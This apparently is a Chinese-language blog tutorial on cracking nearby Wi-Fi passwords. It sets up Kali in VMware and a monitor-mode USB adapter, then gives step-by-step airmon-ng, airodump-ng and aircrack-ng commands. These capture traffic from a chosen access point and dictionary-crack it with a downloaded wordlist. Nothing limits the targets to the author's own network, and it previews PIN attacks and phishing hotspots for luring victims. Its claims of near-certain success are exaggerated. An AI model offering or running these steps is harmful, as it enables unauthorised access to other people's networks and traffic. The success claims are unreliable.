一、部署前准备

1、VMware workstation

官网下载 点击直达

PS:这是官网下载地址需要登录账号,如果你没有账号,就下载共享网盘里的。

博主共享网盘

Alist网盘
来源:网络来源

2、Kali系统

官网下载 点击直达

PS:进去直接下载适用VMware版本的即可。

Snipaste_2023-08-18_23-26-08

Snipaste_2023-08-18_23-27-29

3、USB无线网卡

PS1:无线网卡需要支持AP模式;Monitor模式;在Kali和CDLinux下免驱;支持Aircrack-NG等。

PS2:某宝,某东有卖,直接搜kali无线网卡,比如买下图这种的,另外建议买免驱的,不然到时候还要装驱动,如果买回来发现用不了,问店家要驱动下载链接。

Snipaste_2023-08-18_23-54-49

4、密码本

博主共享网盘

Alist网盘
来源:网络来源

二、安装VMware workstation

Snipaste_2023-08-19_00-14-18

Snipaste_2023-08-19_00-14-32

Snipaste_2023-08-19_00-16-35

Snipaste_2023-08-19_00-16-52

Snipaste_2023-08-19_00-17-04

Snipaste_2023-08-19_00-17-13

Snipaste_2023-08-19_00-18-24

Snipaste_2023-08-19_00-18-52

Snipaste_2023-08-19_00-19-02

Snipaste_2023-08-19_00-19-13

三、安装Kali

PS:将刚刚下载的Kali镜像文件解压缩,你会得到很多vmdk文件和一个vmx文件,将文件存放到自定义位置

Snipaste_2023-08-19_00-29-40

Snipaste_2023-08-19_00-32-35

Snipaste_2023-08-19_00-33-22

上面确认点击完后,界面不管弹什么都不要按键盘,让系统自己运行即可,然后系统会到下图输入账号密码位置

Snipaste_2023-08-19_00-35-01

Snipaste_2023-08-19_00-35-54

3.1、进入root用户

root密码就是:kali

  • 01
sudo -i

3.2、查看IP

此时我还未插入USB无线网卡,所以只能看到lo接口和eth0口

  • 01
ip addr

Snipaste_2023-08-19_00-36-58

3.3、测试上网

  • 01
ping www.baidu.com

Snipaste_2023-08-19_00-37-39

四、安装无线网卡

4.1、插入无线网卡

Snipaste_2023-08-19_00-51-33

4.2、查看网卡

  • 01
ip addr

  • 01
ifconfig

明显没有识别到,要安装驱动

Snipaste_2023-08-19_00-52-55

Snipaste_2023-08-19_00-53-12

4.3、安装驱动

  • 01
apt install realtek-rtl88xxau-dkms

无法安装,应该是更新源的问题,改更新源试试

Snipaste_2023-08-19_00-58-03

4.4、改更新源

  • 01
leafpad /etc/apt/sources.list

没有leafpad命令,根据提示安装

  • 01
apt install leafpad

Snipaste_2023-08-19_01-00-26

也无法安装leafpad命令

Snipaste_2023-08-19_01-04-27

用vim试试可以的

  • 01
vim /etc/apt/sources.list

写入清华大学的保存退出

Snipaste_2023-08-19_01-06-22

  • 01
  • 02
  • 03
#清华大学 [更新源]
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free 
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

  • 01
  • 02
  • 03
#浙江大学[更新源]
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

4.5、使更新源生效

  • 01
apt-get clean && apt-get update -y

Snipaste_2023-08-19_01-11-01

4.6、重新安装无线网卡驱动

  • 01
apt install realtek-rtl88xxau-dkms

Snipaste_2023-08-19_01-12-17

Snipaste_2023-08-19_01-12-49

等跑码跑完后,重启系统

  • 01
reboot now

4.7、检查网卡

重启完成后,输入下面的命令查看,显示wlan0表示正常

  • 01
ip addr

  • 01
ifconfig

Snipaste_2023-08-19_01-22-30

五、寻找附近可抓包Wi-Fi

5.1、停止网络管理器服务

PS:建议关闭,会对抓包效果好一些,不然会影响无线网卡监听和抓包,实测下好像没有影响,但是我测试抓的包基本都无解,可能是我密码本还不够全吧

  • 01
sudo service NetworkManager stop

5.2、结束无线网卡所有进程

  • 01
sudo airmon-ng check kill

Snipaste_2023-08-20_22-57-28

5.2.1、复查进程是否真正关闭

**PS:通过上图回显的可以看出,刚刚将PID=935,Name=wpa_supplicant的进程给kill了,用下面的命令在复查一下**

  • 01
ps -aux | grep wpa_supplicant

PS:如果回显和下面的一样怎关闭,如果还在运行,则会显示俩行,第一行是我们root用户的grep,另一样是用户的运行状态

Snipaste_2023-08-20_23-02-03

5.3、查看网卡状态

PS:我有俩张Kali无线网卡,一张wlan0,一张wlan1

  • 01
ifconfig

Snipaste_2023-08-20_23-23-31

5.4、开启网卡监听模式

  • 01
sudo airmon-ng start wlan0

  • 01
sudo airmon-ng start wlan1

Snipaste_2023-08-20_23-25-29

5.4.1、查看监听网卡名称

  • 01
ifconfig

Snipaste_2023-08-20_23-26-59

5.5、搜索附近所有信号

PS:下面的wlan1填上面ifconfig回显的名称,我用wlan1,因为wlan1可以监听5GHz信号,比wlan0mon好一些,我的wlan0mon无线网卡只能监听2.4GHz信号

PS:如果附近搜不到信号,或者搜索到的信号较弱,或者搜索到的Wi-Fi信息没有数据(数据这里,稍等截图里面教你怎看),我们可以尝试搜索附近5GHz信号

  • 01
sudo airodump-ng wlan1

Snipaste_2023-08-20_23-37-36

5.6、搜索附近5GHz信号

  • 01
airodump-ng -C 5180-5825 wlan0

PS:敲完回车之后要等一会才会出来搜索结果,我的差不多要等1分钟左右,搜索速度应该跟你的无线网卡好坏有关

Snipaste_2023-08-20_23-39-40

Snipaste_2023-08-20_23-42-02

六、上传密码本

PS:通过MobaXtrem左侧上传密码本到Kali系统内

Snipaste_2023-08-21_00-03-11

七、开始抓包

PS:-c 后面的11是信道,--bssid后面的是被抓包wifi的mac,-w是将抓到的数据包存放在当前目录,也就是root目录,用wlan1网卡去抓

  • 01
airodump-ng -c 11 --bssid 02:1B:FF:97:DD:CE -w ./wifi-cap wlan1

Snipaste_2023-08-21_00-15-15

八、开始解包

PS:-w后面是的你的密码本路径,-b后面是被抓包wifi的mac地址,解包的路径也就是下载路径,但是从下面的截图可以看出,不止一个cap包,所以我们用星号代替,这样可以解析所有包

  • 01
aircrack-ng -w /home/young/下载/ruomima.txt -b 02:1B:FF:97:DD:CE  /home/young/下载/wifi-cap*.cap

Snipaste_2023-08-21_00-20-35

Snipaste_2023-08-21_00-25-18

九、进阶版

PS:有空我再更新,这几天没时间搞,另外还有俩种破解方法,PIN和钓鱼wifi,加上本文的密码本破解方式共三种,其中PIN是百分百一定可以破解的,密码本是百分之99.9999999%,钓鱼wfi我试过,如果被钓者懂一些网络知识,可能不会轻易上当,后面给大家模拟一下,钓鱼wifi也是比较牛逼的方法,可以多开钓鱼wifi信号,坐等小鱼上钩。